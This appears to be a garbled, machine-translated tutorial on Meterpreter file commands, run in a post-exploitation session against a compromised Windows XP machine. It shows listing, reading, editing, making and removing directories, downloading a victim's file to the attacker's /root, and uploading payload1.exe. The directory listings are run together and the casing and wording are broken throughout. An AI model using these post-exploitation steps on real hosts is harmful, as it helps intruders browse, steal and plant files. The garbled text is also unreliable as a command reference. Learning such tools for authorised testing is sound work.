1, LS
Meterpreter > ls listing:c:\ ============ Mode Size Type Last modified Name---- -------------------------40777/rwxrwxrwx 0 dir 2013-04-28 05:06:49-0400 $AVG 100777/rwxrwxrwx 0 fil 2012-03-23 23:55:53-0400 AUTOEXEC. BAT 100666/rw-rw-rw-0 fil 2012-03-23 23:55:53-0400 CONFIG. SYS 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:48-0400 Documents and Settings 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 IO. SYS 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 MSDOS. SYS 100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00-0400 ntdetect.com 40555/r-xr-xr-x 0 dir 2013-04- 05:08:25-0400 program Files 40777/rwxrwxrwx 0 dir 2013-04-28 09:27:28-0400 recycler 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:34-0400 System Volume information 40777/rwxrwxrwx 0 dir 2013-04-28 08:45: 45-0400 WindoWS 100777/rwxrwxrwx 131820480 fil 2013-04-28 04:06:33-0400 avg_free_x86_all_2013.exe 100666/rw-rw-rw-211 fi L 2012-03-23 23:51:49-0400 boot 100444/r--r--r--322730 fil 2008-04-14 08:00:00-0400 bootfont.bin 100444/ r--r--r--257728 fil 2008-04-14 08:00:00-0400 ntldr 100666/rw-rw-rw-805306368 fil 2013-04-28 08:45:48-0400 Pagefile.sys 100777/rwxrwxrwx 73802 fil 2013-04-28 09:28:40-0400 payload1.exe 100666/rw-rw-rw-17 fil 2013-04-28 09:34:24-0400 readme.txt 40777/rwxrwxrwx 0 dir 2013-04-28 03:19:27-0400 Ruby Meterpreter &G T
2. pwd
Meterpreter > pwd
\ c \
3. Cat
Meterpreter > Cat Readme.txt
4. Edit
Meterpreter > Edit Readme.txt
VI:/opt/metasploit/common/lib/libcrypto.so.0.9.8:no version information Available (required by/usr/lib/libpython2.6.so.1.0)
VI:/opt/metasploit/common/lib/libssl.so.0.9.8:no version Information available (required by/usr/lib/libpython2.6.so.1.0)
there is nothing.
The usage is the same as VI, but it is not called VI.
Meterpreter > VI readme.txt
[-] Unknown Command:vi.
After saving, the result;
"/TMP/METERP20130428-3310-SNQAGF" 2L, 38C written
[-] Error running command edit:nomethoderror undefined method ' Clo Se ' for "/TMP/METERP20130428-3310-SNQAGF": String
meterpreter > Cat Readme.txt
there are nothing.
There is something.
Meterpreter >
5, Lpwd
Meterpreter > Lpwd
/root
6, MkDir
Meterpreter > ls listing:c:\ ============ Mode Size Type Last modified Name---- -------------------------40777/rwxrwxrwx 0 dir 2013-04-28 05:06:49-0400 $AVG 100777/rwxrwxrwx 0 fil 2012-03-23 23:55:53-0400 AUTOEXEC. BAT 100666/rw-rw-rw-0 fil 2012-03-23 23:55:53-0400 CONFIG. SYS 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:48-0400 Documents and Settings 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 IO. SYS 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 MSDOS. SYS 100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00-0400 ntdetect.com 40555/r-xr-xr-x 0 dir 2013-04- 05:08:25-0400 program Files 40777/rwxrwxrwx 0 dir 2013-04-28 09:27:28-0400 recycler 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:34-0400 System Volume information 40777/rwxrwxrwx 0 dir 2013-04-28 08:45: 45-0400 WindoWS 100777/rwxrwxrwx 131820480 fil 2013-04-28 04:06:33-0400 avg_free_x86_all_2013.exe 100666/rw-rw-rw-211 fi L 2012-03-23 23:51:49-0400 boot 100444/r--r--r--322730 fil 2008-04-14 08:00:00-0400 bootfont.bin 100444/ r--r--r--257728 fil 2008-04-14 08:00:00-0400 ntldr 100666/rw-rw-rw-805306368 fil 2013-04-28 08:45:48-0400 Pagefile.sys 100777/rwxrwxrwx 73802 fil 2013-04-28 09:28:40-0400 payload1.exe 100666/rw-rw-rw-38 fil 2013-04-28 09:37:16-0400 readme.txt 40777/rwxrwxrwx 0 dir 2013-04-28 03:19:27-0400 Ruby Meterpreter &G T mkdir newdir Creating directory:newdir meterpreter > ls listing:c:\ ============ Mode Size Type Last modified Name-----------------------------40777/rwxrwxrwx 0 Dir 2013-04-28 05:06:49-0400 $AVG 100777/rwxrwxrwx 0 fil 2012-03-23 23:55:53-0400 AUTOEXEC. BAT 100666/rw-rw-rw-0 Fil 2012-03-23 23:55:53-0400 CONFIG. SYS 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:48-0400 Documents and Settings 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 IO. SYS 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 MSDOS. SYS 100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00-0400 ntdetect.com 40555/r-xr-xr-x 0 dir 2013-04- 05:08:25-0400 program Files 40777/rwxrwxrwx 0 dir 2013-04-28 09:27:28-0400 recycler 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:34-0400 System Volume information 40777/rwxrwxrwx 0 dir 2013-04-28 08:45: 45-0400 WINDOWS 100777/rwxrwxrwx 131820480 fil 2013-04-28 04:06:33-0400 avg_free_x86_all_2013.exe 100666/rw-rw-rw- 211 fil 2012-03-23 23:51:49-0400 boot. 100444/r--r--r--322730 fil 2008-04-14 08:00:00-0400 BOOTF Ont.bin 40777/rwxrwxrwx 0 dir 2013-04-28 09:42:49-0400 newdir 100444/r--r--r--257728 fil 2008-04-14 08:00:00-0400 NTLDR 100666/rw-rw-rw-805306368 fil 2013-04-28 08:45:48-0400 pagefile.sys 100777/rwxrwxrwx 73 802 fil 2013-04-28 09:28:40-0400 payload1.exe 100666/rw-rw-rw-38 fil 2013-04-28 09:37:16-0400 readm E.txt 40777/rwxrwxrwx 0 dir 2013-04-28 03:19:27-0400 Ruby Meterpreter >
7, RmDir
Meterpreter > ls listing:c:\ ============ Mode Size Type Last modified Name---- -------------------------40777/rwxrwxrwx 0 dir 2013-04-28 05:06:49-0400 $AVG 100777/rwxrwxrwx 0 fil 2012-03-23 23:55:53-0400 AUTOEXEC. BAT 100666/rw-rw-rw-0 fil 2012-03-23 23:55:53-0400 CONFIG. SYS 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:48-0400 Documents and Settings 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 IO. SYS 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 MSDOS. SYS 100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00-0400 ntdetect.com 40555/r-xr-xr-x 0 dir 2013-04- 05:08:25-0400 program Files 40777/rwxrwxrwx 0 dir 2013-04-28 09:27:28-0400 recycler 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:34-0400 System Volume information 40777/rwxrwxrwx 0 dir 2013-04-28 08:45: 45-0400 WindoWS 100777/rwxrwxrwx 131820480 fil 2013-04-28 04:06:33-0400 avg_free_x86_all_2013.exe 100666/rw-rw-rw-211 fi L 2012-03-23 23:51:49-0400 boot 100444/r--r--r--322730 fil 2008-04-14 08:00:00-0400 bootfont.bin 40777/r wxrwxrwx 0 dir 2013-04-28 09:42:49-0400 newdir 100444/r--r--r--257728 fil 2008-04-14 08:00:00-0400 NTLDR 100666/rw-rw-rw-805306368 fil 2013-04-28 08:45:48-0400 pagefile.sys 100777/rwxrwxrwx 73802 fil 2013 -04-28 09:28:40-0400 payload1.exe 100666/rw-rw-rw-38 fil 2013-04-28 09:37:16-0400 Readme.txt 40777/RWXRWXR wx 0 dir 2013-04-28 03:19:27-0400 Ruby meterpreter > RmDir newdir removing Directory:newdir meterprete R > LS listing:c:\ ============ Mode Size Type Last modified Name---- -------------------------40777/rwxrwxrwx 0 dir 2013-04-28 05:06:49-0400 $AVG 10077 7/RWXRWXRWX 0Fil 2012-03-23 23:55:53-0400 AUTOEXEC. BAT 100666/rw-rw-rw-0 fil 2012-03-23 23:55:53-0400 CONFIG. SYS 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:48-0400 Documents and Settings 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 IO. SYS 100444/r--r--r--0 fil 2012-03-23 23:55:53-0400 MSDOS. SYS 100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00-0400 ntdetect.com 40555/r-xr-xr-x 0 dir 2013-04- 05:08:25-0400 program Files 40777/rwxrwxrwx 0 dir 2013-04-28 09:27:28-0400 recycler 40777/rwxrwxrwx 0 dir 2012-03-23 23:59:34-0400 System Volume information 40777/rwxrwxrwx 0 dir 2013-04-28 08:45: 45-0400 WINDOWS 100777/rwxrwxrwx 131820480 fil 2013-04-28 04:06:33-0400 avg_free_x86_all_2013.exe 100666/rw-rw-rw- 211 fil 2012-03-23 23:51:49-0400 boot. 100444/r--r--r--322730 fil 2008-04-14 08:00:00-0400 BOOTF Ont.bin 100444/r--r--r--257728 fil 2008-04-14 08:00:00-0400 NTLDR 100666/rw-rw-rw-805306368 fil 2013-04-28 08:45:48-0400 pagefile.sys 100777/rwxrwxrwx 73 802 fil 2013-04-28 09:28:40-0400 payload1.exe 100666/rw-rw-rw-38 fil 2013-04-28 09:37:16-0400 readm E.txt 40777/rwxrwxrwx 0 dir 2013-04-28 03:19:27-0400 Ruby Meterpreter >
8, download
Meterpreter > Download Readme.txt
[*] downloading:readme.txt readme.txt
[*] Downloaded:readme.txt-&G T Readme.txt
Just see is in the/root directory, so the file will be downloaded to the/root directory
Or:
Meterpreter > Download c:\\readme.txt/tmp/
[*] downloading:c:\readme.txt/tmp//readme.txt
[*] Downloaded:c:\readme.txt-/tmp//readme.txt
9, Upload
Meterpreter > Upload Payload1.exe
[*] uploading : Payload1.exe, Payload1.exe
[*] uploaded : Payload1.exe-Payload1.exe